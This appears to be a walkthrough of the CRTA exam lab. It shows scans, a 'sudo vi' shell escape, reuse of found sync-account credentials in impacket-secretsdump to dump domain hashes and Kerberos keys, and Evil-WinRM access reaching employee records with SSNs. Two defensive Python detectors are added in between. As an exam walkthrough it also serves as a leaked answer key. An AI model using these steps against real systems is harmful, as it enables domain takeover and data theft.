CRTAEXAMWRITEUP

The document contains the results of an Nmap scan on multiple IP addresses, revealing various open ports and services, including SSH and HTTP servers. It also includes sensitive information such as user credentials, Active Directory sync service details, and employee data in XML format. Additionally, there are indications of potential security vulnerabilities and access to critical system information.

Uploaded by

dzero1539

172.26.10.1
[Link]

┌──(kali㉿kali)-[~]
└─$ nmap -sV [Link]
Starting Nmap 7.95 ( [Link] ) at 2025-09-24 20:02 EDT
Nmap scan report for [Link]
Host is up (0.18s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Unbound
80/tcp open http nginx

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 [Link] (ECDSA)
|_ 256 [Link] (ED25519)
3389/tcp filtered ms-wbt-server
8091/tcp open http [Link] Express framework
|_http-title: HotHost
23100/tcp open http Werkzeug httpd 3.1.3 (Python 3.9.22)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/3.1.3 Python/3.9.22
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at [Link] .
Nmap done: 1 IP address (1 host up) scanned in 2075.63 seconds

view-source:[Link]

app-admin:x:1000:1000:@dmin@123:/home/app-admin:/bin/bash
privesc:
sudo vi -c ':!/bin/sh' /dev/null
# ls
[Link] process
# cat [Link]
{
"users": [
{
"id": "07643590-1aea-4de3-91ec-8881600cc54c",
"username": "admin",
"password": "665a26fad71ea9ef3edf5f33195d4b31",
"createdAt": "Mon May 12 2025"
}
],
"monitoringData": [],
"httpMonitoringData": [],
"settings": {
"RAM_THRESHOLD": 90,
"RAM_STABILIZATION_LEVEL": 3,
"DISK_THRESHOLD": 90,
"DISK_STABILIZATION_LEVEL": 1,
"HOST_IS_DOWN_CONFIRMATIONS": 1,
"HTTP_ISSUE_CONFIRMATION": 1,
"DAYS_FOR_SSL_EXPIRED": 14,
"HOURS_FOR_NEXT_ALERT": 12
},
"pluginSettings": []
}
# pwd
/www/hothostdata
#

root@app-server:~/hot/server/frontend/src# cat [Link]


/* WARNING: This is a dummy CSS file with fake credentials - DO NOT USE IN PRODUCTION! */
.login-form {
background-color: #f0f0f0;
padding: 20px;
}

/* Fake credentials (for testing only) */

#username::placeholder { content: "admin"; }


#password::placeholder { content: "P@ssw0rd123!"; } /* Change to Very3stroungPassword */
/* API keys (example only - never store real keys in CSS!) */

.api-key-example {
--stripe-key: "pk_test_51FakeKey1234567890abc";
--aws-key: "AKIAIOSFODNN7EXAMPLE";
}

/* Database connection (mock) */

.db-connection {
/* host:port */

--db-url: "jdbc:mysql://[Link]:3306";
--db-user: "db_admin";
--db-pass: "DB_P@ssw0rd!";
}
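Both leaks above, the password sitting in app-admin's GECOS field of /etc/passwd and the "dummy" CSS file carrying API keys and a database password, are exactly what a plain pattern scan over checked-in files and system files catches before an attacker does. The Python below is an added example, not code from this writeup or from the lab; the CSS and passwd text embedded in it are constructed samples modelled on the page (db.example.internal stands in for the redacted host), and the rule names are my own.

```python
"""Minimal secret scanner for the two leak types shown in the writeup:
credentials embedded in a CSS file and a password left in a passwd GECOS field.
Added example, not part of the original writeup or the lab's code."""
import re
from typing import List, NamedTuple


class Finding(NamedTuple):
    rule: str
    source: str
    lineno: int
    evidence: str  # masked, so the report itself never re-leaks the secret


# (rule name, pattern, regex group that holds the sensitive value)
RULES = [
    ("aws-access-key-id", re.compile(r"\bAKIA[0-9A-Z]{16}\b"), 0),
    ("stripe-key", re.compile(r"\b[ps]k_(?:test|live)_[0-9A-Za-z]{10,}\b"), 0),
    ("jdbc-connection-string", re.compile(r"""jdbc:[a-z]+://[^\s"']+"""), 0),
    ("assigned-password",
     re.compile(r"""(?i)(?:pass(?:word|wd)?|pwd)\s*[:=]\s*["']([^"']+)["']"""), 1),
    ("leet-password-literal", re.compile(r"(?i)p[@4]ssw[0o]rd|passw0rd"), 0),
]

# Constructed sample modelled on the writeup's CSS file (not the real file).
SAMPLE_CSS = """/* WARNING: This is a dummy CSS file with fake credentials - DO NOT USE IN PRODUCTION! */
.login-form {
background-color: #f0f0f0;
padding: 20px;
}
/* Fake credentials (for testing only) */
#username::placeholder { content: "admin"; }
#password::placeholder { content: "P@ssw0rd123!"; } /* Change to Very3stroungPassword */
/* API keys (example only - never store real keys in CSS!) */
.api-key-example {
--stripe-key: "pk_test_51FakeKey1234567890abc";
--aws-key: "AKIAIOSFODNN7EXAMPLE";
}
/* Database connection (mock) */
.db-connection {
/* host:port */
--db-url: "jdbc:mysql://db.example.internal:3306";
--db-user: "db_admin";
--db-pass: "DB_P@ssw0rd!";
}
"""

# Constructed passwd sample: two ordinary entries plus the leak from the page.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
alice:x:1001:1001:Alice Example,Room 101,555-0100:/home/alice:/bin/bash
app-admin:x:1000:1000:@dmin@123:/home/app-admin:/bin/bash
"""


def mask(value: str) -> str:
    """Keep just enough of a value to locate it in the file; hide the rest."""
    if len(value) <= 6:
        return "*" * len(value)
    return value[:4] + "*" * (len(value) - 6) + value[-2:]


def scan_text(text: str, source: str) -> List[Finding]:
    """Run every rule over every line; one finding per rule match."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern, group in RULES:
            for m in pattern.finditer(line):
                findings.append(Finding(rule, source, lineno, mask(m.group(group))))
    return findings


def scan_passwd(text: str) -> List[Finding]:
    """The GECOS field (5th of 7) holds a name, room or phone number, never a
    credential. Flag entries whose GECOS contains password-style symbols."""
    suspicious = re.compile(r"[@!#$%^&*]")
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed or comment line, not a passwd entry
        if suspicious.search(fields[4]):
            findings.append(Finding("credential-in-gecos", f"passwd:{fields[0]}",
                                    lineno, mask(fields[4])))
    return findings


if __name__ == "__main__":
    for f in scan_text(SAMPLE_CSS, "login.css") + scan_passwd(SAMPLE_PASSWD):
        print(f"{f.source}:{f.lineno} {f.rule}: {f.evidence}")
```

The rules are deliberately narrow (documented key prefixes, an assignment to a password-named key, leetspeak password literals) so the scanner stays quiet on normal stylesheets; a GECOS check belongs in host baselining alongside the usual sudoers review, since a password stored there is readable by every local user.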

[Link]
cat /var/log/[Link]

for i in $(seq 1 254); do
    ip="10.10.10.$i"
    # one probe, one-second timeout; quoted so an empty value can't break the command
    ping -c 1 -W 1 "$ip" > /dev/null && echo "$ip is up"
done

[Link] is up
[Link] is up
[Link] is up

================================================================================
Internal Access
================================================================================
Nmap scan report for [Link]
Host is up (0.30s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Unbound
80/tcp open http nginx
|_http-title: pfSense - Login
================================================================================

================================================================================
Nmap scan report for [Link]
Host is up (0.35s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3389/tcp filtered ms-wbt-server
4369/tcp open epmd Erlang Port Mapper Daemon
| epmd-info:
| epmd_port: 4369
|_ nodes:
================================================================================

Nmap scan report for [Link]


Host is up (0.46s latency).
Not shown: 65508 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-25 [Link]Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ent.corp0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ent.corp0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp filtered ms-wbt-server
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
57018/tcp open msrpc Microsoft Windows RPC
60920/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
60921/tcp open msrpc Microsoft Windows RPC
60924/tcp open msrpc Microsoft Windows RPC
60931/tcp open msrpc Microsoft Windows RPC
60945/tcp open msrpc Microsoft Windows RPC
Service Info: Host: ENT-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

================================================================================

[Link]

#Active Directory Sync Service Credentials:

Purpose: Password synchronization between on-prem AD and cloud services (Azure AD Connect).
Service Account: sync_user@[Link]
Password: Summer@2025

#Security Notes:
Syncs password hashes to Azure AD (if hybrid environment).
Critical: Restrict to least privilege (e.g., deny interactive login).

creds
username -> sync_user@[Link]
password -> Summer@2025
================================================================================

┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-secretsdump ent/sync_user:'Summer@2025'@[Link]
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get [Link] secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3d15cb1141d579823f8bb08f1f23e316:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0[Link]
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:36405f88da713c31bbff52e57aea[Link]
[Link]\
sync_user:1103:aad3b435b51404eeaad3b435b51404ee:e58b89915ba50f299b4bb1032589[Link]
ENT-DC$:1000:aad3b435b51404eeaad3b435b51404ee:29086549a2f67233ccf3f447256f[Link]
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:992f0f89c2eec235f94d01103043a3626f1a54e5adc45280ebe58d0883dc294e
Administrator:aes128-cts-hmac-sha1-96:c3c88d0395d8c7e93039108279fa3cb9
Administrator:des-cbc-md5:ad9de62585018c5b
krbtgt:aes256-cts-hmac-sha1-96:1b161ecb048ed49498658525fea07d4278aeab4c8d60ee32e6a61392d14ec924
krbtgt:aes128-cts-hmac-sha1-96:61a3167db44973b38e6ea0ddb9f3f07d
krbtgt:des-cbc-md5:37ad9e49e3ea0b52
[Link]\sync_user:aes256-cts-hmac-sha1-96:73ae7f5121e08ef5224bf82c941db87bf14ce5bf0bc3c0805b95485885db511f
[Link]\sync_user:aes128-cts-hmac-sha1-96:72f6b128b62adb5cf0347e8655f41afc
[Link]\sync_user:des-cbc-md5:377615f8b9106445
ENT-DC$:aes256-cts-hmac-sha1-96:467c04090e14f145e83e442c21fc2066c67e84433d0bad40ff6104ba032333b5
ENT-DC$:aes128-cts-hmac-sha1-96:732407b10baf81e379c7c2f6b8ae8a3b
ENT-DC$:des-cbc-md5:3446e6cd9e8015ba
[*] Cleaning up...
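The line "[*] Using the DRSUAPI method" above means the sync account pulled every domain secret through the directory replication interface rather than from a local copy of NTDS.dit. On the defending side that call leaves Security event 4662 on the domain controller, provided "Audit Directory Service Access" is enabled and the domain object carries a SACL for control-access rights; the event's Properties field lists the replication right GUIDs that were exercised. The Python below is an added example, not part of this writeup; the event records are constructed samples, and the ENT / ENT-DC$ / sync_user names follow the lab naming seen above. The replication-right GUIDs are the documented Active Directory values.

```python
"""Flag replication-right use (the DRSUAPI path secretsdump used above) in
Windows Security event 4662 records. Added example, not part of the writeup;
the events below are constructed samples."""
import re
from typing import Dict, Iterable, List

# Documented control-access-right GUIDs for directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")

# Constructed 4662 samples carrying only the fields the rule needs.
# bf967aba-... is the schema GUID of the "user" class: an ordinary object read.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 4662, "SubjectDomainName": "ENT", "SubjectUserName": "ENT-DC$",
     "ObjectType": "domainDNS", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "ENT", "SubjectUserName": "sync_user",
     "ObjectType": "domainDNS", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "ENT", "SubjectUserName": "jdoe",
     "ObjectType": "user", "AccessMask": "0x20",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4662, "SubjectDomainName": "ENT", "SubjectUserName": "helpdesk1",
     "ObjectType": "domainDNS", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4624, "SubjectDomainName": "ENT", "SubjectUserName": "jdoe"},
]


def replication_rights(properties: str) -> List[str]:
    """Names of the replication rights present in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g] for g in GUID_RE.findall(properties.lower())
            if g in REPLICATION_RIGHTS]


def find_replication_by_non_dc(events: Iterable[Dict],
                               dc_accounts: Iterable[str] = ("ENT-DC$",)) -> List[Dict]:
    """One finding per 4662 event in which a replication right was exercised by
    an account that is not a domain controller's machine account."""
    dcs = {d.upper() for d in dc_accounts}
    findings = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue  # ordinary directory access, not replication
        subject = ev["SubjectUserName"]
        if subject.upper() in dcs:
            continue  # DC-to-DC replication is normal traffic
        findings.append({
            "subject": f"{ev['SubjectDomainName']}\\{subject}",
            "rights": rights,
            # Secrets (password hashes, Kerberos keys) only come back when
            # Get-Changes-All is held; Get-Changes alone reads public attributes.
            "full_dump_possible": "DS-Replication-Get-Changes-All" in rights,
        })
    return findings


if __name__ == "__main__":
    for f in find_replication_by_non_dc(SAMPLE_EVENTS):
        print(f"{f['subject']}: {', '.join(f['rights'])} "
              f"(secrets obtainable: {f['full_dump_possible']})")
```

An Azure AD Connect sync account legitimately holds both replication rights, which is exactly why the account found above could run the dump. Do not allow-list it by name; instead correlate its 4662 events with the logon that produced them (the matching 4624 on the DC) and alert when replication comes from any host other than the AAD Connect server.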

┌──(kali㉿kali)-[~/Desktop]

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type [Link]
<?xml version="1.0" encoding="UTF-8"?>
<Employees>
  <!-- PROTECTED: Contains sensitive employee information - RESTRICT ACCESS -->
  <Employee security-clearance="confidential">
    <ID>E-4281</ID>
    <FullName>Christopher A. Whitaker</FullName>
    <GovernmentID type="SSN">550-12-8421</GovernmentID>
    <Position>Lead Security Architect</Position>
    <Compensation>
      <BaseSalary currency="USD">142000</BaseSalary>
      <Bonus eligibility="true">15000</Bonus>
    </Compensation>
    <AccessCredentials>
      <SSHKeys>
        <RSA-4096>
          <Fingerprint>SHA256:zT4Gp2K9...V3jH91</Fingerprint>
          <PublicKey>ssh-rsa AAAAB3Nza...9Px8= secure-shell@corp</PublicKey>
          <LastRotated>2024-03-15T[Link]Z</LastRotated>
        </RSA-4096>
      </SSHKeys>
      <LastMultiFactorAuth>2024-05-20T[Link]Z</LastMultiFactorAuth>
    </AccessCredentials>
  </Employee>

  <Employee security-clearance="restricted">
    <ID>E-9173</ID>
    <FullName>Danielle M. Chen</FullName>
    <GovernmentID type="SSN">367-88-4102</GovernmentID>
    <Position>Director of Engineering</Position>
    <Compensation>
      <BaseSalary currency="USD">189500</BaseSalary>
      <Equity>2500</Equity>
    </Compensation>
    <AccessCredentials>
      <SSHKeys>
        <Ed25519>
          <Fingerprint>SHA256:7bNq1Rc...YtF62</Fingerprint>
          <PublicKey>ssh-ed25519 AAAAC3N...Vdv2= admin-access@corp</PublicKey>
        </Ed25519>
      </SSHKeys>
    </AccessCredentials>
  </Employee>
</Employees>
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
